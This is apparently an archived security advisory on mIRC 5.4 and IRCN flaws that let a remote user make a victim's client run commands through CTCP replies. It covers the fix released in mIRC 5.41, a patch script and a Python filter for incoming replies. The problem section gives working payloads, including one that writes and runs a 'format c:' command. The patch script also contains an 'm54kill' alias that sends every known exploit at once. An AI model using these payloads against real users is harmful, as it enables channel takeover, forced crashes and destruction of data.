COMMAND

    irc

SYSTEMS AFFECTED

    Systems running mIRC and IRCN

PROBLEM

    A number of vulnerabilities have been found in IRC clients.  Using
    the  command  /ctcpreply,  any  user  can  make  someone using the
    backdoored versions do whatever they want.  For example:

        /ctcpreply (nickname) ping $quit(i,am,owned)
        /ctcpreply Dianora ping $mode(#us-opers,+o,hax0r)

    Result:

        *** ^DaWg^ (DaWg@cc576078-a.essx1.md.home.com) Quit (owned by you)

    The latter will force Dianora to give ops to hax0r in  #us-opers.
    Unix users can telnet to the IRC server on port 6667 and type:

        user bleh bleh bleh bleh bleh
        nick asdfksdjflk (this will be your nick.. Get creative)

    then type:

        notice (nick) (press ctrl + a) ping $quit(i,am,owned)(press ctrl + a)

    and KABOOM!  There are a lot of nice little things you can do with
    this bug.  The target can be forced to run arbitrary programs:

        /ctcpreturn (nick) $run(echo,"echo,y,|,format,c:\",>,c:\autoexec.bat)
        /ctcpreturn (nick) $run(c:\autoexec.bat)

    Any mIRC script  that makes use  of the event  "ON CTCPREPLY PING"
    which does a  $calc or any  other remote/event that  uses $calc is
    exploitable.

SOLUTION

    The author of  mIRC has released  v5.41 to address  these security
    holes and various other bugs in  the 5.4 release. It can be  found
    at

        http://www.mirc.co.uk/

    Most people are  only patching themselves  against the $calc  bug,
    but are  still wondering  why their  mIRC keeps  crashing.   It's
    because  they  have  not  patched  themselves  against the 2 other
    remote mIRC  exploits.   Below is  the patch  for ALL known remote
    mIRC exploits.  To install it, type "/load -rs m54-fix-sploits.mrc"
    (Thanks to myn@efnet).

    ;mIRC 5.4 QuickFIX and Exploits
    ;myn@efnet - 07/22/98


    ;Here is the Quick Fix for all known mIRC 5.4 Exploits to date (07/22/98)

    ;DCC exploit fix
    ctcp *:DCC SEND: { if $4 == 9582342556 { .ignore -tu300 $wildsite | echo -a * Bad send request from $nick $+ : $+ $address $+ : $3- | halt } }
    ctcp *:DCC RESUME: { if $4 == $null { .ignore -tu300 $wildsite | echo -a * Bad send request from $nick $+ : $+ $address $+ : $3- | halt } }

    ;ctcpreply ping $asctime crash and $identifier Exploit fix
    ;replace all instances of the event "on ctcpreply" with the one below

    on 1:CTCPREPLY:PING* {
      if (2147483647 isin $2) { echo -a * Incoming ctcpreply asctime exploit from $nick | halt }
      if ($ isin $2-) { echo -a * Incoming ctcpreply identifier exploit --> $2- from $nick   | halt }
      echo -a * [ $+ $nick PING reply]: $calc($ctime - $2-) sec(s)
      halt
    }

    ;And as an added bonus for all you DALnet kiddies
    ;This sends all known mIRC 5.4 exploits at once
    alias m54kill {
      if ($1) {
        .ctcpreply $1 ping $!quit(I'm, a, DALnet, KiDDie)
        %ip = $rand(600000000,4294967294)
        .quote privmsg $1 : $+ $chr(1) $+ DCC SEND $r(1,99) $+ .txt %ip $r(113,9000) $+ $chr(1) $+ $lf $+ privmsg $1 : $+ $chr(1) $+ DCC RESUME $r(1,99) $+ .txt $+ $chr(1)
        .ctcpreply $1 ping $!asctime(2147483647)
        echo -a * Sent mIRC kills to $1
        halt
      }
      echo -a * Parms [/m54kill nick/#channel]
    }
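
    The CTCPREPLY handler in the fix script rejects replies containing
    "$" or 2147483647.  The same check can be run on raw server lines
    outside the client, as in the Python sketch below.  It is an added
    example, not part of myn's patch or of mIRC.  It goes one step
    further than the script by allowlisting digits only, and its
    function names and sample lines are constructed for illustration.

```python
import re

CTCP = "\x01"  # Ctrl+A, the CTCP delimiter the advisory refers to
# A legitimate PING reply echoes back the timestamp that was sent: digits only.
PING_ARG = re.compile(r"^\d{1,10}( \d{1,10})?$")
ASCTIME_CRASH = "2147483647"  # value the page's fix script rejects


def parse_ctcp_reply(raw):
    """Return (nick, ctcp_command, argument) for a CTCP reply NOTICE, else None."""
    m = re.match(r"^:([^! ]+)\S* NOTICE \S+ :(.*)$", raw.rstrip("\r\n"))
    if not m:
        return None
    nick, body = m.groups()
    if len(body) < 2 or not (body.startswith(CTCP) and body.endswith(CTCP)):
        return None
    command, _, arg = body[1:-1].partition(" ")
    return nick, command.upper(), arg


def classify(raw):
    """Classify a raw server line: 'ignore', 'ok', or a rejection reason."""
    parsed = parse_ctcp_reply(raw)
    if parsed is None or parsed[1] != "PING":
        return "ignore"
    arg = parsed[2]
    if "$" in arg:  # same test as the script's ($ isin $2-)
        return "reject: identifier in reply"
    if ASCTIME_CRASH in arg:  # same test as (2147483647 isin $2)
        return "reject: asctime value"
    if not PING_ARG.match(arg):  # stricter than the script: allowlist
        return "reject: non-numeric reply"
    return "ok"


# Constructed sample lines (nicks and hosts are made up for this example).
SAMPLES = [
    ":alice!a@host.example NOTICE me :\x01PING 901234567\x01",
    ":bob!b@host.example NOTICE me :\x01PING $quit(i,am,owned)\x01",
    ":carol!c@host.example NOTICE me :\x01PING 2147483647\x01",
    ":dave!d@host.example NOTICE me :\x01PING 12abc\x01",
    ":erin!e@host.example NOTICE me :hello there",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line), "<-", repr(line))
```

    A reply is only handed to anything that evaluates it (such as
    $calc) when classify() returns "ok".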